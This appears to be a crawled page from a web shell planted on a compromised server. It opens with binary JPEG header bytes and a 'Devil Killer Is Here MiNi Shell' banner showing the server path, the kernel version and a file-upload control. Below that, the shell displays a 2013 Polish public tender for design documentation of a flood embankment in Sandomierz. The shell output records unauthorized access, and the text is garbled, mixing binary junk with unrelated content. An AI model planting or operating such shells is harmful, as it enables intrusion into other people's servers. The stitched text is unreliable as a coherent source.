JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130827/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130827/170765-N-2013.html

<p class="kh_header"><b>Kielce: opracowanie dokumentacji projektowej p.n.: Rozbudowa wału opaskowego zabezpieczającego przed wodami powodziowymi hutę szkła i osiedle mieszkaniowe w msc. Sandomierz wraz z koncepcją zabezpieczenia portu wraz z uzyskaniem ostatecznej decyzji o pozwoleniu na realizację inwestycji.</b><br>
<b>Numer ogłoszenia: 170765 - 2013; data zamieszczenia: 27.08.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Świętokrzyski Zarząd Melioracji i Urządzeń Wodnych w Kielcach , ul. Witosa 86, 25-561 Kielce, woj. świętokrzyskie, tel. 041 3340105 wew. 209, 309, faks 041 3340105 wew. 409.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.szmiuw.kielce.com.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: wojewódzka samorządowa jednostka organizacyjna nie posiadająca osobowości prawnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> opracowanie dokumentacji projektowej p.n.: Rozbudowa wału opaskowego zabezpieczającego przed wodami powodziowymi hutę szkła i osiedle mieszkaniowe w msc. Sandomierz wraz z koncepcją zabezpieczenia portu wraz z uzyskaniem ostatecznej decyzji o pozwoleniu na realizację inwestycji..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> I.	Opis przedmiotu zamówienia i miejsce realizacji przedmiotu zamówienia


Kod CPV 

71.32.20.00-1	- Usługi inżynierii projektowej w zakresie inżynierii lądowej i wodnej

1.  Przedmiot zamówienia (nazwa). 

Opracowanie dokumentacji projektowej p.n.: Rozbudowa wału opaskowego zabezpieczającego przed wodami powodziowymi hutę szkła i osiedle mieszkaniowe w msc. Sandomierz wraz z koncepcją zabezpieczenia portu wraz z uzyskaniem ostatecznej decyzji o pozwoleniu na realizację inwestycji.


2.  Przedmiot zamówienia (opis). 

Przedmiotem zamówienia jest opracowanie dokumentacji projektowej p.n.: Rozbudowa wału opaskowego zabezpieczającego przed wodami powodziowymi hutę szkła i osiedle mieszkaniowe w msc. Sandomierz wraz z koncepcją zabezpieczenia portu wraz z uzyskaniem ostatecznej decyzji o pozwoleniu na realizację inwestycji.

Przedsięwzięcie obejmuje rozbudowę wału opaskowego, który  chroni: 1. obszar pomiędzy prawym wałem rzeki Wisły (obecnie aktualizowana dokumentacja projektowa pn.: Podwyższenie i rozbudowa prawego wału rzeki Wisły w km 0+000 - 3+350 Huta-Szkła Koćmierzów w msc. Sandomierz), a przedmiotowym wałem opaskowym chroniącym teren zakładu produkcji huty szkła Pilkington, z zakładami przetwórstwa szkła oraz osiedlem mieszkaniowym z niezbędną infrastrukturą; 2. obszar po stronie zewnętrznej wału opaskowego (teren zalany w czasie powodzi w 2010r.). W ramach projektu zostanie opracowana również koncepcja, która wskaże sposób zabezpieczenia przedmiotowego terenu od strony portu, jak i samego portu.  
Konieczność zwiększenia bezpieczeństwa terenu huty szkła Pilkington i portu oraz osiedla mieszkaniowego w Sandomierzu, poprzez podwyższenie oraz zabezpieczenie przeciwfiltracyjne wału opaskowego wynikła po powodzi, która miała miejsce w miesiącach maj - czerwiec w 2010r.  Powódź ta wykazała wysokie znaczenie tego wału dla ochrony nie tylko samego terenu - zakładu produkcji szkła Pilkington, z zakładami przetwórstwa szkła, ale również osiedla mieszkaniowego z niezbędną infrastrukturą oraz terenu portu.  Nieregularna rzędna korony wału powodowała przelewanie się wód powodziowych przez koronę wału na teren huty. Ponadto obserwowano liczne przesiąki i wybicia przez wał.
Przedmiotowe zadanie wchodzi w zakres zadania inwestycyjnego mającego na celu ochronę przed powodzią doliny Wisły - węzeł Sandomierz z rozwiniętą infrastrukturą osadniczo-przemysłową. 
Konieczność modernizacji rozbudowy przedmiotowego wału wynika z opracowanej na zlecenie Świętokrzyskiego Zarządu Melioracji i Urządzeń Wodnych w Kielcach w 2011 roku Koncepcji ochrony przed powodzią Wisły i jej dopływów w rejonie Sandomierza i Tarnobrzega. Obowiązkiem Wykonawcy jest zapoznanie się z w/w dokumentacją.
Rozwiązania projektowe powinny uwzględniać uwarunkowania wynikające z dwóch kluczowych dokumentów koordynujących działania dla integracji celów polityki wodnej ukierunkowanej na obniżenie zagrożenia powodziowego, a mianowicie: 
- Ramowej Dyrektywy Wodnej (Dyrektywa Parlamentu Europejskiego i Rady 2000/60/WE              z dnia 23.10.2000 r. ustanawiająca ramy wspólnotowego działania w dziedzinie polityki wodnej), ustanawiająca ramy na rzecz ochrony wszystkich typów wód;
- Dyrektywy Powodziowej (Dyrektywa 2007/60/WE Parlamentu i Rady z dnia 23.10.2007 r.                  w sprawie oceny ryzyka powodziowego i zarządzania nim), regulująca podstawy podejmowania działań dla ograniczenia zagrożenia powodziowego oraz jego skutków.
Przedmiotowa dokumentacja winna być zgodna z w/w dokumentami z zakresu gospodarki wodnej oraz być spójna z priorytetami i celami ochrony środowiska, w tym ochrony przyrody, ustalonymi w dokumentach strategicznych unijnych, krajowych i regionalnych.
Obowiązkiem Wykonawcy jest przeprowadzenie wizji lokalnej w terenie oraz uzyskanie, na swoją odpowiedzialność i ryzyko, wszelkich istotnych informacji, które mogą być konieczne do przygotowania oferty. Wizję lokalną Wykonawca dokona na swój koszt.
Termin wizji w terenie wykonawca może uzgodnić z pracownikami Oddziału Rejonowego ŚZMiUW w Sandomierzu, nr tel. 15/833-40-42.

I.1. Szczegółowy zakres rzeczowy dokumentacji projektowej.

Wymagania odnośnie dokumentacji projektowo-kosztorysowej:
1) dokumentacja będzie służyć do opisu przedmiotu zamówienia w postępowaniu o udzielenie zamówienia publicznego na roboty budowlane w oparciu o ustawę Prawo zamówień publicznych oraz realizację pełnego zakresu robót budowlanych na jej podstawie, z możliwością podziału na etapy;
2) dokumentacja nie może opisywać przedmiotu zamówienia przez wskazanie znaków towarowych, patentów lub pochodzenia, chyba, że jest to uzasadnione specyfiką przedmiotu zamówienia i nie można tego opisać za pomocą dostatecznie dokładnych określeń, a wskazaniu takiemu towarzyszą wyrazy lub równoważny.; 
3) dokumentacja powinna opisywać przedmiot zamówienia, w tym zastosowane materiały                  i urządzenia, za pomocą cech technicznych i jakościowych, przy przestrzeganiu Polskich Norm przenoszących europejskie normy zharmonizowane. W przypadku braku Polskich Norm przenoszących europejskie normy zharmonizowane uwzględnia się: europejskie aprobaty techniczne, wspólne specyfikacje techniczne;
4) dokumentacja musi być trwale i czytelnie oznaczona, ponadto trwale oprawiona; Zamawiający wymaga aby strona tytułowa każdej części dokumentacji opatrzona została w logotyp Programu ochrony przed powodzią w dorzeczu górnej Wisły. 
5) w opracowanej dokumentacji będą wskazane wyroby budowlane (materiały i urządzenia) dopuszczone do obrotu i powszechnie dostępne na rynku.

Zakres dokumentacji projektowo-kosztorysowej:
1) Wykonanie dokumentacji oraz specyfikacji technicznej wykonania i odbioru robót budowlanych (STWiORB) zgodnie z przepisami Rozporządzenia Ministra Infrastruktury                 z dnia 2 września 2004r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno - użytkowego (Dz. U. z 2010 r. Nr 72, poz. 464 z późn. zm.).
2) Uzyskanie wymaganych opinii, sprawdzeń, uzgodnień dokumentacji projektowej wymaganych przepisami prawa, (w tym uzgodnienie m.in. z: ZUDP, z Regionalnym Zarządem Gospodarki Wodnej i in.).
3) Do obowiązków Wykonawcy należy przygotowanie materiałów i złożenie wniosków                  o decyzje (o środowiskowych uwarunkowaniach, pozwolenia wodnoprawnego   i pozwolenia na realizację inwestycji), dokonywanie wszelkich uzupełnień i poprawek do czasu uzyskania przedmiotowych decyzji. Uzyskanie w/w decyzji leży po stronie Wykonawcy.
4) Dokumentację należy wykonać zgodnie z obowiązującymi przepisami, normami, ze sztuką budowlaną oraz winna być ona opatrzona klauzulą o kompletności i przydatności z punktu widzenia celu, któremu ma służyć wraz z wykazem sporządzonej dokumentacji; informacje zawarte w dokumentacji projektowej w zakresie technologii wykonania robót, doboru materiałów i urządzeń należy określić w sposób zgodny z przepisami ustawy Prawo zamówień publicznych;
5) Wykonawca przedmiotu zamówienia zobowiązany jest do przedstawienia i uzgodnienia                          z Zamawiającym wstępnej fazy rozwiązań projektowych - Rada Techniczna; ponadto Wykonawca zobowiązany jest do zapoznania mieszkańców terenu objętego projektem                    z propozycjami rozwiązań projektowych (okazanie projektu).
6) Wykonawca zobowiązany będzie do sprawowania nadzoru autorskiego w toku robót budowlanych wykonywanych w oparciu o opracowaną dokumentację projektową;

-	Prace przedprojektowe :

A)  Dokumentacja geodezyjna (wersja papierowa + wersja elektroniczna na nośniku DVD, pliki mapowe z rozszerzeniem pdf i dwg lub inne umożliwiające edycję) ma zawierać:
1). aktualne pełne wypisy z ewidencji gruntów,
2). mapę w skali co najmniej 1:1000 przedstawiającą projektowany obszar inwestycji                    z zaznaczeniem podziału geodezyjnego nieruchomości oraz terenu niezbędnego dla obiektów budowlanych oraz istniejące uzbrojenie terenu, 
3). wykaz działek w całości wchodzących pod inwestycję oraz wykaz działek dzielonych,
4). mapy sytuacyjno - wysokościowe w skali 1:1000 lub 1:500 do celów projektowych                      z wykorzystaniem istniejących w PODGiK opracowań geodezyjnych w niezbędnym zakresie do celów projektowych.
Dokumentację należy opracować na aktualnych mapach sytuacyjno-wysokościowych                     z nakładką aktualnej mapy ewidencyjnej (z numerami działek). 
Mapy sytuacyjno-wysokościowe należy zaopatrzyć w klauzulę Powiatowego Ośrodka Dokumentacji Geodezyjnej i Kartograficznej oraz Zespołu Uzgadniania Dokumentacji Projektowej, że są aktualne i nadają się do celów projektowych.  
Mapy ewidencyjne i wypisy z rejestru gruntów należy uzyskać i potwierdzić ich aktualność we właściwym Starostwie Powiatowym.
Pomiary geodezyjne należy wykonać z uwzględnieniem inwentaryzacyjnych pomiarów obiektów komunikacyjnych i innych.
Uwaga! Mapa do celów projektowych powinna zawierać aktualny stan prawny obowiązującej mapy ewidencyjnej i wszystkie elementy mapy zasadniczej.
W zakresie opracowań geodezyjnych należy uwzględnić wykonanie dodatkowo opracowań 
i pomiarów w zakresie niezbędnym dla przeprowadzenia obliczeń i analiz hydraulicznych oraz analiz efektów rzeczowych zabezpieczeń przeciwpowodziowych, stosownie do wymagań modelu hydraulicznego, przedmiotu i zakresu obszarowego analiz (przedmiot zamówienia i zasięg oddziaływania prowadzonych działań inwestycyjnych). 

B)  Materiały do decyzji o środowiskowych uwarunkowaniach (wersja papierowa + wersja elektroniczna na nośniku DVD, pliki mapowe - pliki z rozszerzeniem pdf i dwg lub inne umożliwiające edycję), zgodnie z ustawą z dnia 3 października 2008 r. o udostępnianiu informacji o środowisku i jego ochronie, udziale społeczeństwa w ochronie środowiska oraz o ocenach oddziaływania na środowisko (Dz. U. Nr 199, poz. 1227), w tym raport                          o oddziaływaniu przedsięwzięcia na środowisko lub kartę informacyjną przedsięwzięcia zgodnie z wymogami organów opiniujących i ustalających zakres raportu (wersja papierowa wersja cyfrowa). W/w materiały winny odpowiadać Wytycznym Zasadom weryfikacji przesłanek z art. 4 ust. 7 Ramowej Dyrektywy Wodnej (zwana dalej RDW). Wykonawca zobowiązany jest dokonać oceny oddziaływania realizowanego przedsięwzięcia hydrotechnicznego na stan/potencjał ekologiczny jednolitych części wód, w tym:
-      identyfikację jednolitej części wód powierzchniowych, kategorii jednolitej części wód powierzchniowych oraz przypisanych jej celów środowiskowych
-      dokonać ustalenia czynników oddziaływania przedsięwzięcia na elementy jakości wód (elementy: biologiczne, hydromorfologiczne, fizykochemiczne) - analiza oddziaływań na etapie realizacji i eksploatacji planowanego przedsięwzięcia oraz analiza wpływu planowanego przedsięwzięcia na cele środowiskowe JCWP, działania ukierunkowane na maksymalne złagodzenie skutków przedmiotowego przedsięwzięcia dla określonego celu;
-      przy ocenie istotności oddziaływania przedsięwzięcia na stan wód Wykonawca uwzględni uwarunkowania związane z obowiązkiem osiągnięcia celów środowiskowych                 (informacja wyjaśniająca nt. definicji i zagadnień problemowych w kontekście stosowania art. 4 ust. 7 RDW).
Przedmiotowe materiały do decyzji winny zawierać m. in.:
1) poświadczoną przez właściwy organ kopię mapy ewidencyjnej obejmującej przewidywany teren, na którym będzie realizowane przedsięwzięcie oraz obejmującej obszar, na który będzie oddziaływać przedsięwzięcie;
2) wypis z rejestru gruntów obejmujący przewidywany teren, na którym będzie realizowane przedsięwzięcie oraz obejmujący obszar, na który będzie oddziaływać przedsięwzięcie;
3) kartę informacyjną przedsięwzięcia zawierającą dane określone w art. 3 ust. 1, pkt. 5) ustawy z dnia 3 października 2008 r. o udostępnianiu informacji o środowisku i jego ochronie, udziale społeczeństwa w ochronie środowiska oraz o ocenach oddziaływania na środowisko, uzupełnioną o warunkowania wyszczególnione w art. 63.
UWAGA: w Karcie informacyjnej powinny się znaleźć informacje nt. przeprowadzonej oceny oddziaływania inwestycji na stan wód.

C)  Dokumentacja geotechniczna (3 egz.) w zakresie niezbędnym do ustalenia                          rodzaju gruntów i kategorii geotechnicznej, w oparciu o szczegółowe wytyczne wynikające z opinii geotechnicznej i projektu badań geotechnicznych w lokalizacji działań inwestycyjnych, zgodnie z Rozporządzeniem MSWiA z dnia 24.09.1998r. (Dz.U. Nr 126 poz. 839) w sprawie ustalenia geotechnicznych warunków posadowienia obiektów budowlanych; W przypadku, gdy zakres inwestycji będzie występował w obszarze III kategorii geotechnicznej ze względu na skomplikowane warunki gruntowe, zgodnie z art.8 pkt. 2 w/w Rozporządzenia MSWiA z dnia 24.09.1998 r. (Dz.U. Nr 126 poz. 839) dla tej kategorii należy dodatkowo opracować dokumentację geologiczno - inżynierską (3 egz.) wraz z uzyskaniem decyzji zatwierdzającej.

D)   Przygotowanie niezbędnych materiałów do uzyskania decyzji z art. 118 ustawy z dnia 16.04.2004 r. o ochronie przyrody (Dz. U. z 2004 r. Nr 92, poz. 6056, z późn. zm.) ustalającej warunki prowadzenia robót - jeśli będzie dotyczyć.

E) Dane hydrologiczne w zakresie niezbędnym do wykonania przedmiotu zamówienia Wykonawca pozyska z IMGW.
Obliczenia i analizy hydrauliczne należy wykonać przy  uwzględnieniu:
-	przepływów obliczeniowych i warunków technicznych wynikających  z: 
-	Rozporządzenia Ministra Środowiska z dnia 20 kwietnia 2007r. w sprawie warunków technicznych jakim powinny odpowiadać budowle hydrotechniczne i ich usytuowanie; 
-	Rozporządzenia Ministra Transportu i Gospodarki Morskiej z dnia 30 maj 2000r. w sprawie warunków jakim powinny odpowiadać drogowe obiekty inżynierskie i ich usytuowanie
-	Inne przepisy techniczne związane.
Wykonawca uzgodni wyniki wykonanych w przedmiocie zmówienia obliczeń i analiz hydraulicznych z instytucjami państwowymi właściwymi do opracowania map zagrożenia 
i ryzyka powodziowego (RZGW w Krakowie). 
W wykonywanych obliczeniach i analizach hydrologiczno - hydraulicznych należy wykorzystać dane wysokościowe (NMT, NMPT oraz ortofotomapy) na obszarze objętym przedmiotem zamówienia oraz  w zakresie wynikającym z metodyki prowadzonych obliczeń.

F)  Studium wykonalności (wersja papierowa + wersja elektroniczna na nośniku CD, - pliki z rozszerzeniem pdf i doc) - mające na celu dostarczenie inwestorowi, w oparciu               o wielowariantową analizę, wszelkich danych niezbędnych do podjęcia decyzji inwestycyjnej.
Zakres studium wykonalności w szczególności powinien obejmować analizę:                                     
-	 Ochrony przeciwpowodziowej (w tym powierzchnia obszaru chronionego 
w poszczególnych miejscowościach, liczba ludności na obszarze zabudowanym, rodzaj chronionej infrastruktury z podaniem rodzaju i kilometrażu, małe i średnie przedsiębiorstwa, zabudowania mieszkalne i gospodarcze, obiekty użyteczności publicznej, obiekty chronione     i inne nie wymienione). Obszar chroniony winien być naniesiony na mapy poglądowe;
-	Wpływ na wzrost atrakcyjności inwestycyjnej (zwiększenie terenów dostępnych pod budownictwo, przewidywane powstanie małych i średnich przedsiębiorstw, gospodarstw agroturystycznych itp.); 
-  Przeprowadzenie   analizy   opłacalności   realizacji   inwestycji.   Studium   powinno obejmować wszelkie aspekty techniczne, finansowe, ekonomiczne oraz związane ze środowiskiem naturalnym uwarunkowania zadania inwestycyjnego. Celem studium jest dostarczenie przesłanek do podjęcia decyzji o przyznanie środków finansowych                     z funduszy pomocowych dla planowanej inwestycji.
- Hierarchizację zadania inwestycyjnego i możliwości jego etapowania.
- Wariantowość rozwiązań.

-	Prace projektowe:

A) Projekt budowlany (wersja papierowa + wersja elektroniczna na nośniku CD lub DVD, załączniki mapowe - pliki z rozszerzeniem pdf i dwg lub inne umożliwiające edycję)                     w zakresie uwzględniającym specyfikę robót budowlanych, opracowany zgodnie                              z wymogami art. 34 ustawy z dnia 7 lipca 1994 r. Prawo budowlane (t. j. Dz. U. z 2010 r.            Nr 243, poz. 1623) oraz z Rozporządzeniem Ministra Transportu, Budownictwa i Gospodarki morskiej z dnia 25 kwietnia 2012r. w sprawie szczegółowego zakresu i formy projektu budowlanego (Dz. U. z 2012 r. poz. 462) oraz z zapisami:
- Rozporządzenia Ministra Środowiska z dnia 20 kwietnia 2007 r. w sprawie warunków technicznych, jakim powinny odpowiadać budowle hydrotechniczne i ich usytuowanie                          ( Dz. U. Nr 86  z 2007r. poz.579);      
-  Ustawy z dnia 3 października 2008 r. o udostępnianiu informacji o środowisku                      i jego ochronie, udziale społeczeństwa w ochronie środowiska oraz o ocenach oddziaływania na środowisko (Dz. U. Nr 199, poz. 1227 z 2008 r. z późn. zm.);
 
-  Ustawy z dnia 18 lipca 2001 r. Prawo wodne (t.j. Dz. U. z 2012 r. poz. 145);
-  Rozporządzenia Rady Ministrów z dnia 09.11.2004 r. w sprawie określenia rodzajów przedsięwzięć mogących znacząco oddziaływać na środowisko oraz szczegółowych uwarunkowań związanych z kwalifikowaniem przedsięwzięcia do sporządzania raportu                     o oddziaływaniu na środowisko (Dz. U. Nr 257 poz. 2573);
- Ustawy z dnia 27.03.2003 r. o planowaniu i zagospodarowaniu przestrzennym 
(tj. Dz. U. z 2012 r. poz. 647, 951, 1445, z 2013r. poz.21);
- Ustawy z dnia 08.07.2010r. o szczególnych zasadach przygotowania do realizacji inwestycji w zakresie budowli przeciwpowodziowych (Dz. U. Nr  143 poz. 963);
- Ustawą z dnia 29 stycznia 2004 r. Prawo zamówień publicznych (Dz. U. Nr 19 poz. 177                 z późn. zm.);
- Ustawą z dnia 21.08.1997 r. o gospodarce nieruchomościami (tj. Dz. U. Nr 261 poz. 2603               z 2004 r. z późn. zm.);
- oraz przepisami wykonawczymi do tych ustaw i obowiązującymi w dacie przekazania opracowania przepisami, obowiązującymi Polskimi Normami pozwalającymi na uzyskanie pełnych uzgodnień projektu i pozwolenia na realizację inwestycji. 
W przypadku zmian w przepisach, pociągających za sobą potrzebę uzyskania nowych decyzji bądź uzgodnień, Wykonawca ma obowiązek ich pozyskania. Dokumentacja projektowa powinna uwzględniać wszystkie obowiązki na dzień przekazania jej Zamawiającemu.

B) W przypadku kolizji z uzbrojeniem terenu (naziemnym i podziemnym) projekty branżowe (wersja papierowa + wersja elektroniczna na nośniku DVD, załączniki mapowe - pliki z rozszerzeniem pdf i dwg lub inne umożliwiające edycję) wraz z  uzgodnieniami                           i pozwoleniami, decyzja ZUDP;

C)  Informacja BIOZ (wersja papierowa + wersja elektroniczna na nośniku CD, - pliki                    z rozszerzeniem pdf i doc) opracowana zgodnie z Rozporządzeniem Ministra Infrastruktury z dnia 23 czerwca 2003 r. w sprawie informacji dotyczącej bezpieczeństwa                 i ochrony zdrowia oraz planu bezpieczeństwa i ochrony zdrowia (Dz. U. Nr 120 poz. 1126);

D) Projekt wykonawczy (wersja papierowa + wersja elektroniczna na nośniku DVD, załączniki mapowe - pliki z rozszerzeniem pdf i dwg lub inne umożliwiające edycję), uzupełniający i uszczegółowiający projekt budowlany w zakresie i stopniu dokładności niezbędnym do sporządzenia przedmiaru robót, kosztorysu inwestorskiego oraz realizacji robót budowlanych; 


E) Przedmiary robót (wersja papierowa + wersja elektroniczna na nośniku CD, - pliki                         z rozszerzeniem pdf i kst lub innym umożliwiającym edycję), sporządzone zgodnie z wymogami określonymi w  Rozporządzeniu Ministra Infrastruktury z dnia 2 września 2004r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno - użytkowego (Dz. U. z 2004 r. Nr 202 poz. 2072 z późn. zm.). Pozycje przedmiaru powinny odnosić się do konkretnych pozycji STWIORB.

F) Kosztorys inwestorski (wersja papierowa + wersja elektroniczna na nośniku CD, - pliki z rozszerzeniem pdf i kst lub innym umożliwiającym edycję), opracowany zgodnie                        z Rozporządzeniem Ministra Infrastruktury z dnia 18 maja 2004 r. w sprawie określenia metod i podstaw sporządzania kosztorysu inwestorskiego, obliczania planowanych kosztów prac projektowych oraz planowanych kosztów robót budowlanych określonych w programie funkcjonalno - użytkowym (Dz. U. z 2004 r. Nr 130 poz. 1389 z późn. zm.). 
Dodatkowo należy sporządzić zestawienie R, M, S.

G) Specyfikacja techniczna wykonania i odbioru robót budowlanych (wersja papierowa + wersja elektroniczna na nośniku CD, - pliki z rozszerzeniem pdf i doc), zawierająca zbiory wymagań niezbędnych dla określenia standardu i jakości wykonania robót, w zakresie wykonania robót budowlanych, właściwości wyrobów budowlanych oraz oceny prawidłowości wykonania poszczególnych robót - sporządzona zgodnie                                      z Rozporządzeniem Ministra Infrastruktury z dnia 2 września 2004 r. (Dz. U. z 2004 r. Nr 202 poz. 2072 z późn. zm.). STWiORB należy opracować z uwzględnieniem podziału szczegółowego według Wspólnego Słownika Zamówień. STWIORB powinna szczegółowo określać parametry techniczne zastosowanych wyrobów (materiały , urządzenia) i winna być szczegółowo skorelowana z pozycjami przedmiaru.

H) Operat wodnoprawny (wersja papierowa + wersja elektroniczna na nośniku CD, - pliki z rozszerzeniem pdf  i doc) zgodnie z Ustawą z dnia 18 lipca 2001r. Prawo wodne           (t.j. Dz. U. z 2012 r. poz. 145);

I)   Operat dendrologiczny (wersja papierowa + wersja elektroniczna na nośniku CD, - pliki z rozszerzeniem pdf i doc) na podstawie przeprowadzonej inwentaryzacji gatunkowej drzew i krzewów przewidzianych w projekcie do wycinki, z dokładnym                              i czytelnym zaznaczeniem (kolorem i numerem) drzew i krzewów do usunięcia, ze wskazaniem właściciela. Opracowanie należy uzgodnić z właściwymi jednostkami,                       a inwentaryzacja ma zawierać m.in.: informację o właścicielu lub posiadaczu nieruchomości, na której rosną drzewa i krzewy, nazwę gatunków drzew i krzewów, obwód pnia na wysokości 1,30m, wielkość powierzchni, z której zostaną usunięte krzewy. Wykonawca uzyska również zgodę właścicieli poszczególnych nieruchomości na wycinkę drzew oraz przygotuje (w razie potrzeby) wniosek do uzyskania  decyzji na wycinkę drzew               i krzewów a także uzyska decyzje zezwalające na usunięcie drzew i krzewów. Inwentaryzację drzew i krzewów przeznaczonych do wycinki powinna być sporządzona na 
aktualnej mapie do celów projektowych oraz zawierać wykaz właścicieli działek zgodnie                             z ewidencją gruntów. 

J)  Uzgodnienie lokalizacji rezerw ziemnych - (wersja papierowa + wersja elektroniczna na nośniku CD, - pliki z rozszerzeniem pdf i doc) oraz opracowanie projektu zagospodarowania rezerw ziemnych wraz z badaniami geotechnicznymi przydatności gruntu na nasyp wału oraz sporządzeniem map sytuacyjno-wysokościowych terenu lokalizacji rezerw w skali 1:1000;
